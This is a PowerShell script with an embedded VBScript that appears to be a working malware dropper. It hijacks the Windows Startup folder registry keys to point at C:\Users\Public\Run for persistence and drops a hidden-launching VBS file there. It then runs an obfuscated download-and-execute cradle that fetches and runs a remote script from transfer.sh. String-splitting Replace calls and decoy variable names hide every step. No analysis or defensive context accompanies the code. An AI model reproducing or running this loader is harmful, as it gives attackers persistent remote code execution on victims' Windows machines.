$H1="C:\Use++++++++++++++++++++un".Replace("++++++++++++++++++++","rs\Public\R")
$H2 = "Crea--------------------ry".Replace("--------------------","teDirecto")
[system.io.directory]::$H2($H1)
start-sleep -s 5
$H3 = "HKCU:\Softw-----------------lders".Replace("-----------------","are\Microsoft\Windows\CurrentVersion\Explorer\User Shell Fo")
$H4= "HKCU:\Softwar+++++++++++++++++++++++++++ders".Replace("+++++++++++++++++++++++++++","e\Microsoft\Windows\CurrentVersion\Explorer\Shell Fol")
$H5 = "C:\Us--------------c\Run".Replace("--------------","ers\Publi")
$H6 ="C------------blic\Run".Replace("------------",":\Users\Pu")
Set-ItemProperty -Path $H3 -Name "Startup" -Value $H5;
Set-ItemProperty -Path $H4 -Name "Startup" -Value $H6;
start-sleep -s 5
$Content = @'
Dim SERDTFYUGHIJOPKERSTFYGUH
A1 = "E"
A3 = "W"
A4 = "E" & "L"
Set SERDTFYUGHIJOPKERSTFYGUH= CreateObject(""+A3+"ScriPt.SH"+A4+"L")
Donal="P" &"O" & "W"
Trump = "E"
mike = Chr(82) & "s"&"H" & "E"
pompeo = "L"
Elon =Chr(76)&" $TRUMP = 'http://transfer.sh/1fogyms/dfddefencestudies.txt';$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');"
COIN = Donal+Trump++mike+pompeo+Elon+""
SERDTFYUGHIJOPKERSTFYGUH.Run COIN,0,True
Set-Content -Path C:\Users\Public\Run\Run.vbs -Value $Content
start-sleep -s 5
$TRUMP = 'http://transfer.sh/1fogyms/dfddefencestudies.txt';
$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');
$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');
$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');
&('I'+'EX')($A -Join '')|&('I'+'EX');